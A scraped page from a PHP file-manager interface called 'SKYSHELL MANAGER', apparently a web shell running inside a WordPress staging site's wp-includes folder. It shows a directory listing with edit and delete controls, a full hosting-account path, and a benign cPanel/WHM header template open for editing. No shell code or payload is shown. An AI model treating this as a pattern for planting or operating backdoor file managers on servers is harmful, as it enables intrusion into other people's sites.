📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: header.tmpl
[% USE Whostmgr -%] <script type="text/javascript" src="[% MagicRevision('/yui-gen/utilities_container/utilities_container.js') %]"></script> <script type="text/javascript" src="[% CPANEL.get_cjt_url() %]"></script> <link rel="stylesheet" type="text/css" href="[% MagicRevision('/themes/x/gsw_optimized.css') %]" /> <style type="text/css"> /*yui modal background, modal:true*/ .mask{z-index:1;display:none;position:absolute;top:0;left:0;right:0;bottom:0;} .mask{background-color:#000;opacity:.25;*filter:alpha(opacity=25);} </style> <script type="text/javascript"> function toggle_visibility(id) { var e = document.getElementById(id); if(e.style.display == 'block') e.style.display = 'none'; else e.style.display = 'block'; } function kill_visibility(id){ var e = document.getElementById(id); e.style.display = 'none'; } </script> </head> [% # Check if license flags contain vps. This check is needed because even if envtype is changed # in the envtype flag file, as long as the license is under vps optimized, we still show the vps logo. SET flag_has_vps = Whostmgr.has_license_flag('vps'); SET is_vps = flag_has_vps && envtype && envtype != 'standard'; %] <body id="setup" class="yui-skin-sam"> <div class="container" id="branding"> <div id="logo"> <h1> <img alt="WHM" src="[% MagicRevision('/themes/x/logo.svg') %]" /> </h1> </div> <div id="version"> <p> <h6 class="title"> </h6> </p> </div> </div> <noscript><div id="js_warning">[% locale.maketext("You [output,strong,must] enable JavaScript in your browser in order to use this interface.") %] [% locale.maketext("Enable JavaScript in your browser’s settings, and then try again.") %] </div> </noscript>
Save